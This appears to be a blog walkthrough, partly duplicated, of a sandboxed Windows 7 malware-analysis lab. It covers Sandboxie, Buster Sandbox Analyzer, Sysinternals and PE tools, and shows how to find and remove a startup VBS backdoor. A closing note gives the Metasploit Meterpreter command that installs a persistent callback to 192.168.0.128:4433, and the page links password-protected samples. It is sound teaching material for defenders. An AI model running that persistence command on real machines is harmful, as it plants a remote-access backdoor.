Tools that will be used on this part 2:
VMware Player/ VMware Workstation
Oracle VirtualBox
Windows 7 32/64 bits ISO
Windows 7 32/64 bits ISO
Buster Sandbox Analyzer 1.88
Sandboxie 3.70
The following sandbox testing was running on Sandboxie 3.70 with Buster Sandbox Analyzer 1.88
Sandboxie 3.70
The following sandbox testing was running on Sandboxie 3.70 with Buster Sandbox Analyzer 1.88
===Environment Setup===
The following environment setup used VMware Workstation and Windows 7 Ultimate 64 bits SP1.
After that just click Finish, then it will automatically power on the machine if you enable "Power on this virtual machine after creation"
After finished install Windows, it will auto install vmware-tool and then restart.
# Install Wireshark
# Extract Buster Sandbox Analyzer (BSA)
# Install and configure Sandboxie
Add the following to your configuration file and save.
InjectDll=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API32.dll
InjectDll64=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API64.dll
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
* Note: Select your buster sandbox analyzer path.
On your BSA, select your Sandbox location:
# Extract sysinternals suite into a folder
Start > Right Click Computer > Properties > Advanced system settings > Advanced tab > Environment Variables > Path > Copy the Sysinternals path > Ok > Ok > Ok
Open CMD and type tcpview/ autoruns/ procexp/ procmon will prompt an agreement box, just click Accept:
# Install CFF Explorer
# Extract and run PeStudio
Let's take a snapshot on the virtual machine before we proceed.
On your VMware Workstation, VM Tab > Snapshot > Take Snapshot
===Analyze the malware===
Base on Part 1, if you have malware sample, simply drag and drop or copy and paste into your virtual machine. After the malware inside the machine, run it.
Open your Process Explorer and check any suspicious process is using network connection.
Base on the malicious file location, drag and drop the malware into PeStudio.
Drag and drop the malware into CFF Explorer.
Drag and drop the malware into PEiD.
It may prompt "Delete Sandbox Folder contents and continue" and "Ignore Sandbox Folder contents and continue". You can select Ignore Sandbox Folder contents and continue.
Let's drop the malicious file into Sandboxie, and choose Defaultbox.
The result analysis from BSA:
Spot the wsscript process in the Process Explorer:
Terminate the process by Right click > Kill Process Tree. OR you can press Shift+Delete key on your keyboard.
After stopped or killed the process, we are good to remove or delete the registry key and the executable file. Refer to Part 1 on how to remove the registry key and the value.
* Note: If you are familiar with Metasploit, you will notice the EXE and VBS are generated by Metasploit Meterpreter command run persistence -U -i 5 -p 4433 -r 192.168.0.128
Sample file: EXE VBS
Password: infected
End of Just another Malware Analysis Guide (2) - Bigger Picture
Create a new virtual machine
Select your Windows 7 iso
Configure your machine performance
After that just click Finish, then it will automatically power on the machine if you enable "Power on this virtual machine after creation"
After finished install Windows, it will auto install vmware-tool and then restart.
# Install Wireshark
Just click Next it finish installed.
# Extract Buster Sandbox Analyzer (BSA)
# Install and configure Sandboxie
Configure Sandboxie.
Add the following to your configuration file and save.
InjectDll=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API32.dll
InjectDll64=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API64.dll
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
* Note: Select your buster sandbox analyzer path.
On your BSA, select your Sandbox location:
# Extract sysinternals suite into a folder
Start > Right Click Computer > Properties > Advanced system settings > Advanced tab > Environment Variables > Path > Copy the Sysinternals path > Ok > Ok > Ok
Open CMD and type tcpview/ autoruns/ procexp/ procmon will prompt an agreement box, just click Accept:
Go to your Sysinternals Suite folder, locate procexp, Right Click > Properties > Compatibility tab > Enable Run as Administrator:
Right click Select Columns > Enable DEP, ASLR, Verify Sign, Network Sends and Receives.
Network Sends and Receives require Administrator only can view.
You can see which process is using network.
The above shows the library imported by calc.exe.
# Extract and run PeStudio
Let's take a snapshot on the virtual machine before we proceed.
On your VMware Workstation, VM Tab > Snapshot > Take Snapshot
===Analyze the malware===
Base on Part 1, if you have malware sample, simply drag and drop or copy and paste into your virtual machine. After the malware inside the machine, run it.
Open your Process Explorer and check any suspicious process is using network connection.
Double click on the suspicious process to view more information about the running program.
wsock32.dll and ws2_32.dll library are used for launching network connection.
Drag and drop the malware into CFF Explorer.
Drag and drop the malware into PEiD.
PEiD shows there are base64 encoded in the program.
Open you Sandboxie and Buster Sandbox Analyzer, click Start Analysis on your BSA.
After click Start Analysis, it will wait for any file execute in Sandboxie.
Let's drop the malicious file into Sandboxie, and choose Defaultbox.
The result analysis from BSA:
You will notice a connection to IP address 192.168.0.128 with port 4433.
wsock32.dll, ws2_32.dll and wshtcpip.dll were used for perform network connection.
Notice the location of the malicious file is at Temp folder. Do you feels weird how it execute by itself? Let's recall back Part 1, you can use wmic command to extract all startup program.
CMD :/> wmic startup list full > startup.txt
Suspicious visual basic script (vbs) on registered on startup.
Open the vbs in text editor, the source code has been obfuscated with random characters but that's ok. We can briefly understand what is the script trying to do.
It used Wscript.Shell to execute the malicious EXE file.
Spot the wsscript process in the Process Explorer:
Terminate the process by Right click > Kill Process Tree. OR you can press Shift+Delete key on your keyboard.
After stopped or killed the process, we are good to remove or delete the registry key and the executable file. Refer to Part 1 on how to remove the registry key and the value.
* Note: If you are familiar with Metasploit, you will notice the EXE and VBS are generated by Metasploit Meterpreter command run persistence -U -i 5 -p 4433 -r 192.168.0.128
Sample file: EXE VBS
Password: infected
End of Just another Malware Analysis Guide (2) - Bigger Picture
No comments:
Post a Comment